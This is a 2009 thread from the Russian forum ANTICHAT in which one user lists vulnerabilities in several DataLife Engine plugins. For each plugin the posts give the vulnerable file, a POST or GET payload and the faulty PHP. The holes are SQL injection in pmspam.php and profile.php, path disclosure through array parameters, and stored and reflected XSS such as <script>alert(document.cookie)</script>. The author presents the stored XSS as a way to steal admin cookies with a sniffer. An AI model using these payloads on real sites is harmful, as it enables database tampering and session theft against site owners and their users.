HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.02.2009, 16:08
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

SPAM BUTTON in PM
Версия: v.1.0


ВОЗМОЖНО Sql-INJ

Уязвимый скрипт: engine\inc\pmspam.php
Запрос: flag=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
  if($_POST['spam_flag'])
  {
      foreach (
$_POST['spam_flag'] as $key => $value)
      {
        
$delete_spam_query "DELETE FROM " PREFIX "_spam_pm WHERE id = '$value'";
        
$delete_spam_query_id $db->query($delete_spam_query);
          if(!
$delete_spam_query)
          {
            
$spam_err true;
          }
      }
  } 
 
Ответить с цитированием

  #2  
Старый 27.02.2009, 17:29
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Цитата:
Сообщение от -Hormold-  
SPAM BUTTON in PM
Версия: v.1.0


ВОЗМОЖНО Sql-INJ

Уязвимый скрипт: engine\inc\pmspam.php
Запрос: flag=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
  if($_POST['spam_flag'])
  {
      foreach (
$_POST['spam_flag'] as $key => $value)
      {
        
$delete_spam_query "DELETE FROM " PREFIX "_spam_pm WHERE id = '$value'";
        
$delete_spam_query_id $db->query($delete_spam_query);
          if(!
$delete_spam_query)
          {
            
$spam_err true;
          }
      }
  } 
Что значит возможно?
 
Ответить с цитированием

  #3  
Старый 27.02.2009, 16:25
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

DLE HACK SERVICE BETA
Версия: v.1.0


Расскрытие путей

Уязвимый скрипт: engine\inc\md5.php
Запрос: pass[]=md5
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST['pass'])) {
   
$pass=trim(htmlspecialchars($_POST['pass']));
   
$pass=md5($pass);

 
Ответить с цитированием

  #4  
Старый 27.02.2009, 16:41
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Простой мини чат для Dle
Версия: v.1.0


Расскрытие путей

Уязвимый скрипт: shout.php
Запрос: name[]=1&message[]=msg
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST["name"], $_POST["message"])){
    
$name iconv("UTF-8""windows-1251"$_POST["name"]);
    
$message iconv("UTF-8""windows-1251"$_POST["message"]); 
Ошибка вызывается тем, что iconv неможет обработать Массив который передаётся через POST
 
Ответить с цитированием

  #5  
Старый 27.02.2009, 16:45
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Простой мини чат для Dle
Версия: v.1.0


Активная XSS

Уязвимый скрипт: shout.php
Запрос: name=<h1> 1 </h1>&message=<h1> xsss </h1>
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST["name"], $_POST["message"])){
    
$name iconv("UTF-8""windows-1251"$_POST["name"]);
    
$message iconv("UTF-8""windows-1251"$_POST["message"]);
           
///........
            
$file[] = $id."¤".$name."¤".$message."¤".time()."\n";
            
///........
            
foreach ($file as $msgfwrite($fp$msg); 
///........ 
Этот баг даёт возможность поставить сниффер, и ловить куки
 
Ответить с цитированием

  #6  
Старый 27.02.2009, 16:56
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

profileZ. Смена логина
Версия: v.1.5


Sql-INJ

Уязвимый скрипт: engine/modules/profile.php
Запрос: usertitle=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
    $usertitle=$_POST['usertitle'];
    if (
strlen($password1)>0) {

    
$password1 md5(md5($password1));
    
    
$sql_user "UPDATE " USERPREFIX "_users set name='$usertitle', fullname='$fullname', land='$land', icq='$icq', email='$email', info='$info', signature='$signature', password='$password1', allow_mail='$allow_mail', xfields='$filecontents', allowed_ip='$allowed_ip' where name='$user'";
    
    } else {
    
$sql_user "UPDATE " USERPREFIX "_users set name='$usertitle', fullname='$fullname', land='$land', icq='$icq', email='$email', info='$info', signature='$signature', allow_mail='$allow_mail', xfields='$filecontents', allowed_ip='$allowed_ip' where name='$user'";
    
    } 
 
Ответить с цитированием

  #7  
Старый 27.02.2009, 17:18
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

hacking attemptz
Версия: v.1.0


Активная XSS от любого пользователя(100% кража куки админа)

Уязвимый скрипт: hacking_attemptz_fnct.php
Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
function log_user($host)
   {
      global 
$ip;
         
$log_date date('d.m.Y');
         
$log_time date('H:i:s');
      
$log_info "

<tr>
 <td align='center'>"
.$_POST['login_name']."</td>
 <td align='center'>
$log_date</td>
 <td align='center'>
$log_time</td>
 <td align='center'>
$ip</td>
 <td align='center'>"
.gethostbyaddr($ip)."</td>
</hr>
"

Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом!
Смотрим админку, и вот! XSS видна
 
Ответить с цитированием

  #8  
Старый 27.02.2009, 18:02
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Friends of Suite
Версия: v.1.3


Расскрытие путей

Уязвимый скрипт: inc/friend.php
Запрос: reg_name[]=123&reg_adress[]=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
  if ($_POST['docreate'] == "create")
  {
     
$name               trim(htmlspecialchars(stripslashes($_POST['name'])));
     
$address            trim(htmlspecialchars(stripslashes($_POST['address']))); 
 
Ответить с цитированием

  #9  
Старый 27.02.2009, 18:08
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Friends of Suite
Версия: v.1.3


Активная XSS от любого пользователя(100% кража куки админа)

Уязвимый скрипт: friend.php
Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>&reg_adress=http://127.0.0.1/
Метод: POST
Уязвимый кусок кода:
PHP код:
//пока ненашёл... 
Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост.
Смотрим админку, и вот! XSS видна :P
Хотя script удаляет...

Последний раз редактировалось -Hormold-; 27.02.2009 в 18:16..
 
Ответить с цитированием

  #10  
Старый 28.02.2009, 00:40
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

DataLife Engine Redirect
Версия: v.1.1

XSS

Уязвимый скрипт: engine/redirect.php
Запрос: url=http://site.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
$url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php'); 


Переадресация для ссылок(^^ странно похожи...)!
Версия: v.1.0

XSS

Уязвимый скрипт: engine/redikt.php
Запрос: ?url=http://sasa.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
    $url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php'); 

Последний раз редактировалось -Hormold-; 28.02.2009 в 00:47..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ